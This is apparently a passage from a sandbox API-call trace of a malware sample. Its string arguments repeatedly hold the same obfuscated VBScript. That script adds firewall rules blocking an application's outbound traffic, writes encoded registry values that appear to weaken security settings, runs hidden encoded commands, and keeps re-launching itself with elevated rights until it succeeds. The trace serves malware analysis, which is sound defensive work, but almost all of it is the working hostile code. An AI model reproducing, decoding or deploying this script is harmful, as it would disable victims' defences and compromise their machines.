str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.345] wcsncmp (_String1="es\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.345] wcsncmp (_String1="s\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.345] wcsncmp (_String1="\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.345] wcsncmp (_String1="\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run 